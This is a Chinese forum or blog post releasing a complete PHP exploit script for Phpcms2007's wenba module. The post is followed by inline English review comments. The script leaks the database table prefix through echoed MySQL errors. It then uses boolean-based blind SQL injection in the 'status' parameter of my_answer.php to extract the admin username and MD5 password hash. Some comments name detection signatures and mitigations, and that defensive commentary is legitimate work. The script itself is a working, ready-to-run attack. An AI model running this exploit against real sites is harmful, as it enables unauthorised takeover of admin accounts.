早前在 phpcms 0day 频发的时候写的这个 exp，藏了一个多月吧，也没有拿它去打站，一直丢在我硬盘里。今天看到第 11 期的黑防公布了，于是我也丢出来吧：
PHP代码
- <?
- // Short open tag: only works with short_open_tag=On; `<?php` is the portable form.
- // Banner is printed on every run, before the arguments are validated.
- print_r('
- --------------------------------------------------------------------------------
- Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit
- BY oldjun[S.U.S](http://www.oldjun.com)
- --------------------------------------------------------------------------------
- ');
- // CLI usage check. $argc includes the script name itself, so fewer than three
- // entries means host or path is missing. Nothing below checks that $argv[1] is
- // non-empty or that it resolves; that surfaces later as a connect failure.
- if ($argc<3) {
- print_r('
- --------------------------------------------------------------------------------
- Usage: php '.$argv[0].' host path
- host: target server (ip/hostname),without"http://"
- path: path to phpcms
- Example:
- php '.$argv[0].' localhost /
- --------------------------------------------------------------------------------
- ');
- die;
- }
- // Send one raw HTTP request to $host on TCP port 80 and store the complete
- // response (status line, headers and body, as returned by fgets) in the
- // global $html. $packet must be the full request text, including the
- // terminating blank line. Returns nothing; on connect failure it prints a
- // message and exits the script.
- //
- // Review notes:
- // - Plain HTTP to a hard-coded port 80; no TLS and no timeout on either the
- //   connect or the read loop, so a server that keeps the socket open stalls
- //   the whole script.
- // - The read loop ends only when the server closes the connection (feof);
- //   the callers send "Connection: Close" for that reason.
- // - fsockopen() emits a PHP warning on failure before the die below.
- function sendpacketii($packet)
- {
- global $host, $html;
- $ock=fsockopen(gethostbyname($host),'80');
- if (!$ock) {
- echo 'No response from '.$host; die;
- }
- fputs($ock,$packet);
- $html='';
- while (!feof($ock)) {
- $html.=fgets($ock);
- }
- fclose($ock);
- }
- $host=$argv[1];
- $path=$argv[2];
- // Default table prefix; overwritten below if the server leaks the real one.
- $prefix="phpcms_";
- // Fixed PHPSESSID value. It is only attached to the first probe (L"get $prefix"
- // request); every later request is sent without a cookie.
- $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
- // Path must start and end with '/'. `<>` is the same operator as `!=`.
- // An empty $path would raise an undefined-offset notice here rather than a
- // clean error.
- if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
- {echo "Error... check the path!\r\n\r\n"; die;}
- /*get $prefix*/
- // Step 1: table-prefix discovery. A deliberately malformed `status` value is
- // sent; if the response echoes MySQL's "in your SQL syntax" error, the prefix
- // is cut out of the echoed query text between "FROM " and "wenba_answer".
- // This step only works because the application returns raw database error
- // text to the client. Turning off display of DB errors removes the leak; the
- // `/**/`-as-whitespace pattern in the `status` parameter is a useful log/WAF
- // signature for this probe.
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Cookie: ".$cookie."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- //echo $html;
- // eregi()/ereg() were removed in PHP 7.0; this script needs PHP 5.x as written.
- if (eregi("in your SQL syntax",$html))
- {
- $temp=explode("FROM ",$html);
- // $temp2 is only assigned when "FROM " occurred; otherwise the next line
- // reads an undefined variable (notice) and the default prefix is kept.
- if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}
- if($temp2[0])
- $prefix=$temp2[0];
- echo "[+]prefix -> ".$prefix."\r\n";
- }
- echo "[~]exploting now,plz waiting...\r\n\r\n";
- // Step 2: sanity probe with an always-true condition. If the response still
- // contains the six-byte sequence below (looks like GBK-encoded text; presumably
- // the page's "no results" message, given the error printed here), the module
- // has no rows to key the boolean oracle on, and the script stops.
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n"; die;}
- // Candidate byte values for the password: 0 as the end-of-string marker, plus
- // the alphabet of a lowercase hex digest ('0'-'9', 'a'-'f'). At most 17
- // requests per character position.
- $chars[0]=0;//null
- $chars=array_merge($chars,range(48,57)); //numbers
- $chars=array_merge($chars,range(97,102));//a-f letters
- // Step 3: boolean-based blind extraction of member.password for userid=1, one
- // character per outer iteration ($j = 1-based position). Each request asks
- // whether exactly one row has ASCII(SUBSTRING(password,$j,1)) == $i; the
- // "no results" marker being absent is read as "true". The loop ends when a
- // 0 byte is accepted, which presumably happens once $j runs past the end of
- // the stored value. Detection: bursts of requests to wenba/my_answer.php
- // from one client whose `status` parameter differs only in the compared
- // numeric value. Mitigation: cast/bind `status` as an integer before it is
- // used in SQL.
- $j=1;$password="";
- while (!strstr($password,chr(0)))
- {
- for ($i=0; $i<=255; $i++)
- {
- if (in_array($i,$chars))
- {
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;}
- }
- // Reaching 255 without a break means no candidate matched at this position.
- if ($i==255) {die("Exploit failed...");}
- }
- $j++;
- }
- // Step 4: same oracle for member.username, but without the candidate filter,
- // so every byte value 0-255 is tried (up to 256 requests per character).
- $j=1;$username="";
- while (!strstr($username,chr(0)))
- {
- for ($i=0; $i<=255; $i++)
- {
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\r\n";break;}
- if ($i==255) {die("Exploit failed...");}
- }
- $j++;
- }
- // Both values still carry the trailing 0 byte appended when the loops ended.
- // NOTE(review): "32λ" in the label below looks like a mis-encoded "32位"
- // (32 characters); the string is runtime output and is left as-is here.
- print_r('
- --------------------------------------------------------------------------------
- [+]username -> '.$username.'
- [+]password(md5 32λ) -> '.$password.'
- --------------------------------------------------------------------------------
- ');
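- // Return true when $hash, after trim() (which strips surrounding whitespace
- // and NUL bytes by default), starts with 32 lowercase hex digits; false
- // otherwise. Only the start is anchored, so longer inputs also pass; that
- // matches the original check. ereg() was removed in PHP 7.0, so the test uses
- // preg_match(), whose return is compared with 1 (0 = no match, false = error).
- function is_hash($hash)
- {
- return preg_match('/^[a-f0-9]{32}/', trim($hash)) === 1;
- }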
- // Final verdict: counted as a success only if the recovered value looks like
- // a 32-digit hex digest according to is_hash().
- echo is_hash($password) ? "Exploit succeeded..." : "Exploit failed...";
- ?>
